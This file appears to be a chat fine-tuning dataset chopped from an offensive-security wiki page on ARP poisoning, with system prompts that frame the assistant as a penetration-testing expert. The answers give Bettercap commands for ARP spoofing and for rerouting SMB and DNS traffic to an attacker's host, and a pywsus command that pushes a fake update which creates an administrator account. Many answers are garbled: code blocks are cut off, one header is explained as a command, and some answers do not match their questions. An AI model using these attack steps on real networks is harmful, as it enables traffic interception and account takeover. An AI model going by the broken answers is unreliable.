"Tell me about ARP poisoning - Packet forwarding", "response": "Bettercap also has the any.proxy module that has multiple options to allows multiple scenarios\n\n* any.proxy.iface allows to set the interface to redirect packets from\n* any.proxy.protocol can be set to UDP or TCP to specify on which transport protocol the packets to reroute will transit \n* any.proxy.src_address refers to the destination address of the packets to reroute. This usually has to be set to the spoofed server IP address. Packets that were originally sent to that server will be rerouted and sent to another one. This option has to be set when doing the rerouting technique.This option can be blank. Bettercap will then reroute every packet received without filtering on the address. For instance, this is useful when doing a WSUS or DNS spoofing attack on multiple victims at the same time.\n* any.proxy.src_port refers to the destination port of the packets to reroute. This usally has to be set to the spoofed service port. Packets that were originally sent to that server will be rerouted and sent to another one. This option has to be set when doing the rerouting technique.\n* any.proxy.dst_address refers to the IP address the matched packets are to be sent to. For instance, when doing WSUS or DNS spoofing attacks in a rerouting technique mode, this option has to be set to the IP address of the attacker's server.\n* any.proxy.dst_port refers to the port the matched packets are to be sent to.", "metadata": {"corpus_index": 791, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/arp-poisoning.md", "page_title": "ARP poisoning", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for ARP poisoning - Packet forwarding?"}, {"role": "assistant", "content": "Bettercap also has the any.proxy module that has multiple options to allows multiple scenarios\n\n* any.proxy.iface allows to set the interface to redirect packets from\n* any.proxy.protocol can be set to UDP or TCP to specify on which transport protocol the packets to reroute will transit \n* any.proxy.src_address refers to the destination address of the packets to reroute. This usually has to be set to the spoofed server IP address. Packets that were originally sent to that server will be rerouted and sent to another one. This option has to be set when doing the rerouting technique.This option can be blank. Bettercap will then reroute every packet received without filtering on the address. For instance, this is useful when doing a WSUS or DNS spoofing attack on multiple victims at the same time.\n* any.proxy.src_port refers to the destination port of the packets to reroute. This usally has to be set to the spoofed service port. Packets that were originally sent to that server will be rerouted and sent to another one. This option has to be set when doing the rerouting technique.\n* any.proxy.dst_address refers to the IP address the matched packets are to be sent to. For instance, when doing WSUS or DNS spoofing attacks in a rerouting technique mode, this option has to be set to the IP address of the attacker's server.\n* any.proxy.dst_port refers to the port the matched packets are to be sent to."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for ARP poisoning - Packet forwarding?", "response": "Bettercap also has the any.proxy module that has multiple options to allows multiple scenarios\n\n* any.proxy.iface allows to set the interface to redirect packets from\n* any.proxy.protocol can be set to UDP or TCP to specify on which transport protocol the packets to reroute will transit \n* any.proxy.src_address refers to the destination address of the packets to reroute. This usually has to be set to the spoofed server IP address. Packets that were originally sent to that server will be rerouted and sent to another one. This option has to be set when doing the rerouting technique.This option can be blank. Bettercap will then reroute every packet received without filtering on the address. For instance, this is useful when doing a WSUS or DNS spoofing attack on multiple victims at the same time.\n* any.proxy.src_port refers to the destination port of the packets to reroute. This usally has to be set to the spoofed service port. Packets that were originally sent to that server will be rerouted and sent to another one. This option has to be set when doing the rerouting technique.\n* any.proxy.dst_address refers to the IP address the matched packets are to be sent to. For instance, when doing WSUS or DNS spoofing attacks in a rerouting technique mode, this option has to be set to the IP address of the attacker's server.\n* any.proxy.dst_port refers to the port the matched packets are to be sent to.", "metadata": {"corpus_index": 791, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/arp-poisoning.md", "page_title": "ARP poisoning", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does ARP poisoning - 🛠️ Bettercap logging work?"}, {"role": "assistant", "content": "Bettercap's logging can be controlled so that only essential information is shown. Becoming a man-in-the-middle can be a little overwhelming when not filtering the info shown to the user.\n\n* events.ignore TODO //"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does ARP poisoning - 🛠️ Bettercap logging work?", "response": "Bettercap's logging can be controlled so that only essential information is shown. Becoming a man-in-the-middle can be a little overwhelming when not filtering the info shown to the user.\n\n* events.ignore TODO //", "metadata": {"corpus_index": 792, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/arp-poisoning.md", "page_title": "ARP poisoning", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for ARP poisoning - 🛠️ Bettercap logging"}, {"role": "assistant", "content": "Bettercap's logging can be controlled so that only essential information is shown. Becoming a man-in-the-middle can be a little overwhelming when not filtering the info shown to the user.\n\n* events.ignore TODO //"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for ARP poisoning - 🛠️ Bettercap logging", "response": "Bettercap's logging can be controlled so that only essential information is shown. Becoming a man-in-the-middle can be a little overwhelming when not filtering the info shown to the user.\n\n* events.ignore TODO //", "metadata": {"corpus_index": 792, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/arp-poisoning.md", "page_title": "ARP poisoning", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does ARP poisoning - 🛠️ Tips & tricks work?"}, {"role": "assistant", "content": "* wireshark, make sure forwarded packets appear twice, one with MAC 1 -> MAC 2, one with MAC 2 -> MAC 3 (1=victim, 2=attacker, 3=gateway)\n* Make sure the attacker and the victim client are on the same subnet, I don't know how to operate when they are not\n* tracert on the client to make sure packets are forwarded if possible\n* make sure it's not the DNS\n* make sure the iptables rules are ok and allow forwarding --> networking\n* make sure to run bettercap in a privileged container with network host\n* options can be written in a .cap file and launched with bettercap with the following command and optionsbettercap --iface $interface --caplet caplet.cap"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does ARP poisoning - 🛠️ Tips & tricks work?", "response": "* wireshark, make sure forwarded packets appear twice, one with MAC 1 -> MAC 2, one with MAC 2 -> MAC 3 (1=victim, 2=attacker, 3=gateway)\n* Make sure the attacker and the victim client are on the same subnet, I don't know how to operate when they are not\n* tracert on the client to make sure packets are forwarded if possible\n* make sure it's not the DNS\n* make sure the iptables rules are ok and allow forwarding --> networking\n* make sure to run bettercap in a privileged container with network host\n* options can be written in a .cap file and launched with bettercap with the following command and optionsbettercap --iface $interface --caplet caplet.cap", "metadata": {"corpus_index": 793, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/arp-poisoning.md", "page_title": "ARP poisoning", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on ARP poisoning - 🛠️ Tips & tricks"}, {"role": "assistant", "content": "* wireshark, make sure forwarded packets appear twice, one with MAC 1 -> MAC 2, one with MAC 2 -> MAC 3 (1=victim, 2=attacker, 3=gateway)\n* Make sure the attacker and the victim client are on the same subnet, I don't know how to operate when they are not\n* tracert on the client to make sure packets are forwarded if possible\n* make sure it's not the DNS\n* make sure the iptables rules are ok and allow forwarding --> networking\n* make sure to run bettercap in a privileged container with network host\n* options can be written in a .cap file and launched with bettercap with the following command and optionsbettercap --iface $interface --caplet caplet.cap"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on ARP poisoning - 🛠️ Tips & tricks", "response": "* wireshark, make sure forwarded packets appear twice, one with MAC 1 -> MAC 2, one with MAC 2 -> MAC 3 (1=victim, 2=attacker, 3=gateway)\n* Make sure the attacker and the victim client are on the same subnet, I don't know how to operate when they are not\n* tracert on the client to make sure packets are forwarded if possible\n* make sure it's not the DNS\n* make sure the iptables rules are ok and allow forwarding --> networking\n* make sure to run bettercap in a privileged container with network host\n* options can be written in a .cap file and launched with bettercap with the following command and optionsbettercap --iface $interface --caplet caplet.cap", "metadata": {"corpus_index": 793, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/arp-poisoning.md", "page_title": "ARP poisoning", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about ARP poisoning - Scenarios examples"}, {"role": "assistant", "content": "Below are examples or targeted ARP poisoning attacks where the attacker wants to hijack packets aimed at a specific server (SMB, DNS, WSUS, ...), to answer with evil responses. The \"dumping network secrets\" scenario is the one attackers use to dump credentials on the network (usually in order to find an initial foothold).\n\n::: tabs\n\n=== SMB spoofing\n\nStart the SMB server for capture or relay then start the poisoning attack.\n\n```bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about ARP poisoning - Scenarios examples", "response": "Below are examples or targeted ARP poisoning attacks where the attacker wants to hijack packets aimed at a specific server (SMB, DNS, WSUS, ...), to answer with evil responses. The \"dumping network secrets\" scenario is the one attackers use to dump credentials on the network (usually in order to find an initial foothold).\n\n::: tabs\n\n=== SMB spoofing\n\nStart the SMB server for capture or relay then start the poisoning attack.\n\n```bash", "metadata": {"corpus_index": 794, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/arp-poisoning.md", "page_title": "ARP poisoning", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for ARP poisoning - Scenarios examples"}, {"role": "assistant", "content": "Below are examples or targeted ARP poisoning attacks where the attacker wants to hijack packets aimed at a specific server (SMB, DNS, WSUS, ...), to answer with evil responses. The \"dumping network secrets\" scenario is the one attackers use to dump credentials on the network (usually in order to find an initial foothold).\n\n::: tabs\n\n=== SMB spoofing\n\nStart the SMB server for capture or relay then start the poisoning attack.\n\n```bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for ARP poisoning - Scenarios examples", "response": "Below are examples or targeted ARP poisoning attacks where the attacker wants to hijack packets aimed at a specific server (SMB, DNS, WSUS, ...), to answer with evil responses. The \"dumping network secrets\" scenario is the one attackers use to dump credentials on the network (usually in order to find an initial foothold).\n\n::: tabs\n\n=== SMB spoofing\n\nStart the SMB server for capture or relay then start the poisoning attack.\n\n```bash", "metadata": {"corpus_index": 794, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/arp-poisoning.md", "page_title": "ARP poisoning", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe set the ARP spoofing in the context of penetration testing"}, {"role": "assistant", "content": "set arp.spoof.targets $client_ip\nset arp.spoof.internal false\nset arp.spoof.fullduplex false"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe set the ARP spoofing in the context of penetration testing", "response": "set arp.spoof.targets $client_ip\nset arp.spoof.internal false\nset arp.spoof.fullduplex false", "metadata": {"corpus_index": 795, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/arp-poisoning.md", "page_title": "ARP poisoning", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform set the ARP spoofing?"}, {"role": "assistant", "content": "set arp.spoof.targets $client_ip\nset arp.spoof.internal false\nset arp.spoof.fullduplex false"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform set the ARP spoofing?", "response": "set arp.spoof.targets $client_ip\nset arp.spoof.internal false\nset arp.spoof.fullduplex false", "metadata": {"corpus_index": 795, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/arp-poisoning.md", "page_title": "ARP poisoning", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of reroute traffic aimed at the original SMB server"}, {"role": "assistant", "content": "set any.proxy.iface $interface\nset any.proxy.protocol TCP\nset any.proxy.src_address $SMB_server_ip\nset any.proxy.src_port 445\nset any.proxy.dst_address $attacker_ip\nset any.proxy.dst_port 445"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of reroute traffic aimed at the original SMB server", "response": "set any.proxy.iface $interface\nset any.proxy.protocol TCP\nset any.proxy.src_address $SMB_server_ip\nset any.proxy.src_port 445\nset any.proxy.dst_address $attacker_ip\nset any.proxy.dst_port 445", "metadata": {"corpus_index": 796, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/arp-poisoning.md", "page_title": "ARP poisoning", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for reroute traffic aimed at the original SMB server"}, {"role": "assistant", "content": "set any.proxy.iface $interface\nset any.proxy.protocol TCP\nset any.proxy.src_address $SMB_server_ip\nset any.proxy.src_port 445\nset any.proxy.dst_address $attacker_ip\nset any.proxy.dst_port 445"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for reroute traffic aimed at the original SMB server", "response": "set any.proxy.iface $interface\nset any.proxy.protocol TCP\nset any.proxy.src_address $SMB_server_ip\nset any.proxy.src_port 445\nset any.proxy.dst_address $attacker_ip\nset any.proxy.dst_port 445", "metadata": {"corpus_index": 796, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/arp-poisoning.md", "page_title": "ARP poisoning", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is control logging and verbosity?"}, {"role": "assistant", "content": "events.ignore endpoint\nevents.ignore net.sniff.mdns"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is control logging and verbosity?", "response": "events.ignore endpoint\nevents.ignore net.sniff.mdns", "metadata": {"corpus_index": 797, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/arp-poisoning.md", "page_title": "ARP poisoning", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for control logging and verbosity"}, {"role": "assistant", "content": "events.ignore endpoint\nevents.ignore net.sniff.mdns"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for control logging and verbosity", "response": "events.ignore endpoint\nevents.ignore net.sniff.mdns", "metadata": {"corpus_index": 797, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/arp-poisoning.md", "page_title": "ARP poisoning", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is start the modules?"}, {"role": "assistant", "content": "any.proxy on\narp.spoof on\nnet.sniff on\n``\n\n=== DNS spoofing\n\nStart the DNS server (responder, dnschef, or bettercap) for DNS poisoning then start the ARP poisoning attack.\n\n``bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is start the modules?", "response": "any.proxy on\narp.spoof on\nnet.sniff on\n``\n\n=== DNS spoofing\n\nStart the DNS server (responder, dnschef, or bettercap) for DNS poisoning then start the ARP poisoning attack.\n\n``bash", "metadata": {"corpus_index": 798, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/arp-poisoning.md", "page_title": "ARP poisoning", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on start the modules"}, {"role": "assistant", "content": "any.proxy on\narp.spoof on\nnet.sniff on\n``\n\n=== DNS spoofing\n\nStart the DNS server (responder, dnschef, or bettercap) for DNS poisoning then start the ARP poisoning attack.\n\n``bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on start the modules", "response": "any.proxy on\narp.spoof on\nnet.sniff on\n``\n\n=== DNS spoofing\n\nStart the DNS server (responder, dnschef, or bettercap) for DNS poisoning then start the ARP poisoning attack.\n\n``bash", "metadata": {"corpus_index": 798, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/arp-poisoning.md", "page_title": "ARP poisoning", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do start the modules"}, {"role": "assistant", "content": "=== DNS spoofing\n\nStart the DNS server ([responder](https://github.com/lgandx/Responder), [dnschef](https://github.com/iphelix/dnschef), or [bettercap](https://github.com/bettercap/bettercap)) for [DNS poisoning](dns-spoofing.md) then start the ARP poisoning attack."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do start the modules", "response": "=== DNS spoofing\n\nStart the DNS server ([responder](https://github.com/lgandx/Responder), [dnschef](https://github.com/iphelix/dnschef), or [bettercap](https://github.com/bettercap/bettercap)) for [DNS poisoning](dns-spoofing.md) then start the ARP poisoning attack.", "metadata": {"corpus_index": 799, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/arp-poisoning.md", "page_title": "ARP poisoning", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `=== DNS spoofing`?"}, {"role": "assistant", "content": "This command is used for start the modules. start the modules"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `=== DNS spoofing`?", "response": "This command is used for start the modules. start the modules", "metadata": {"corpus_index": 799, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/arp-poisoning.md", "page_title": "ARP poisoning", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does reroute traffic aimed at the original DNS server work?"}, {"role": "assistant", "content": "set any.proxy.iface $interface\nset any.proxy.protocol UDP\nset any.proxy.src_address $DNS_server_ip\nset any.proxy.src_port 53\nset any.proxy.dst_address $attacker_ip\nset any.proxy.dst_port 53"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does reroute traffic aimed at the original DNS server work?", "response": "set any.proxy.iface $interface\nset any.proxy.protocol UDP\nset any.proxy.src_address $DNS_server_ip\nset any.proxy.src_port 53\nset any.proxy.dst_address $attacker_ip\nset any.proxy.dst_port 53", "metadata": {"corpus_index": 800, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/arp-poisoning.md", "page_title": "ARP poisoning", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for reroute traffic aimed at the original DNS server?"}, {"role": "assistant", "content": "set any.proxy.iface $interface\nset any.proxy.protocol UDP\nset any.proxy.src_address $DNS_server_ip\nset any.proxy.src_port 53\nset any.proxy.dst_address $attacker_ip\nset any.proxy.dst_port 53"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for reroute traffic aimed at the original DNS server?", "response": "set any.proxy.iface $interface\nset any.proxy.protocol UDP\nset any.proxy.src_address $DNS_server_ip\nset any.proxy.src_port 53\nset any.proxy.dst_address $attacker_ip\nset any.proxy.dst_port 53", "metadata": {"corpus_index": 800, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/arp-poisoning.md", "page_title": "ARP poisoning", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does start the modules work?"}, {"role": "assistant", "content": "any.proxy on\narp.spoof on\nnet.sniff on\n``\n\n=== WSUS spoofing\n\nARP poisoning for WSUS spoofing in a two-subnets layout (attacker + client in the same segment, legitimate WSUS server in another one). Packets from the client to the WSUS server need to be hijacked and sent to the attacker's evil WSUS server. In order to do so, the attacker must pose as the client's gateway, route all traffic to the real gateway except the packets destined to the WSUS server.\n\nThe evil WSUS server needs to be started before doing ARP poisoning. The pywsus (Python) utility can be used for that matter.\n\n`bash\npython3 pywsus.py --host $network_facing_ip --port 8530 --executable /path/to/PsExec64.exe --command '/accepteula /s cmd.exe /c \"net user testuser /add && net localgroup Administrators testuser /add\"'\n`\n\nOnce the WSUS server is up and running, the ARP poisoning attack can start.\n\n``bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does start the modules work?", "response": "any.proxy on\narp.spoof on\nnet.sniff on\n``\n\n=== WSUS spoofing\n\nARP poisoning for WSUS spoofing in a two-subnets layout (attacker + client in the same segment, legitimate WSUS server in another one). Packets from the client to the WSUS server need to be hijacked and sent to the attacker's evil WSUS server. In order to do so, the attacker must pose as the client's gateway, route all traffic to the real gateway except the packets destined to the WSUS server.\n\nThe evil WSUS server needs to be started before doing ARP poisoning. The pywsus (Python) utility can be used for that matter.\n\n`bash\npython3 pywsus.py --host $network_facing_ip --port 8530 --executable /path/to/PsExec64.exe --command '/accepteula /s cmd.exe /c \"net user testuser /add && net localgroup Administrators testuser /add\"'\n`\n\nOnce the WSUS server is up and running, the ARP poisoning attack can start.\n\n``bash", "metadata": {"corpus_index": 801, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/arp-poisoning.md", "page_title": "ARP poisoning", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through start the modules"}, {"role": "assistant", "content": "any.proxy on\narp.spoof on\nnet.sniff on\n``\n\n=== WSUS spoofing\n\nARP poisoning for WSUS spoofing in a two-subnets layout (attacker + client in the same segment, legitimate WSUS server in another one). Packets from the client to the WSUS server need to be hijacked and sent to the attacker's evil WSUS server. In order to do so, the attacker must pose as the client's gateway, route all traffic to the real gateway except the packets destined to the WSUS server.\n\nThe evil WSUS server needs to be started before doing ARP poisoning. The pywsus (Python) utility can be used for that matter.\n\n`bash\npython3 pywsus.py --host $network_facing_ip --port 8530 --executable /path/to/PsExec64.exe --command '/accepteula /s cmd.exe /c \"net user testuser /add && net localgroup Administrators testuser /add\"'\n`\n\nOnce the WSUS server is up and running, the ARP poisoning attack can start.\n\n``bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through start the modules", "response": "any.proxy on\narp.spoof on\nnet.sniff on\n``\n\n=== WSUS spoofing\n\nARP poisoning for WSUS spoofing in a two-subnets layout (attacker + client in the same segment, legitimate WSUS server in another one). Packets from the client to the WSUS server need to be hijacked and sent to the attacker's evil WSUS server. In order to do so, the attacker must pose as the client's gateway, route all traffic to the real gateway except the packets destined to the WSUS server.\n\nThe evil WSUS server needs to be started before doing ARP poisoning. The pywsus (Python) utility can be used for that matter.\n\n`bash\npython3 pywsus.py --host $network_facing_ip --port 8530 --executable /path/to/PsExec64.exe --command '/accepteula /s cmd.exe /c \"net user testuser /add && net localgroup Administrators testuser /add\"'\n`\n\nOnce the WSUS server is up and running, the ARP poisoning attack can start.\n\n``bash", "metadata": {"corpus_index": 801, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/arp-poisoning.md", "page_title": "ARP poisoning", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for start the modules?"}, {"role": "assistant", "content": "=== WSUS spoofing\n\nARP poisoning for [WSUS spoofing ](wsus-spoofing.md)in a two-subnets layout (attacker + client in the same segment, legitimate WSUS server in another one). Packets from the client to the WSUS server need to be hijacked and sent to the attacker's evil WSUS server. In order to do so, the attacker must pose as the client's gateway, route all traffic to the real gateway except the packets destined to the WSUS server.\n\nThe evil WSUS server needs to be started before doing ARP poisoning. The [pywsus ](https://github.com/GoSecure/pywsus)(Python) utility can be used for that matter."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for start the modules?", "response": "=== WSUS spoofing\n\nARP poisoning for [WSUS spoofing ](wsus-spoofing.md)in a two-subnets layout (attacker + client in the same segment, legitimate WSUS server in another one). Packets from the client to the WSUS server need to be hijacked and sent to the attacker's evil WSUS server. In order to do so, the attacker must pose as the client's gateway, route all traffic to the real gateway except the packets destined to the WSUS server.\n\nThe evil WSUS server needs to be started before doing ARP poisoning. The [pywsus ](https://github.com/GoSecure/pywsus)(Python) utility can be used for that matter.", "metadata": {"corpus_index": 802, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/arp-poisoning.md", "page_title": "ARP poisoning", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `=== WSUS spoofing`?"}, {"role": "assistant", "content": "This command is used for start the modules. start the modules"}], "system": "You are a cybersecurity educator. 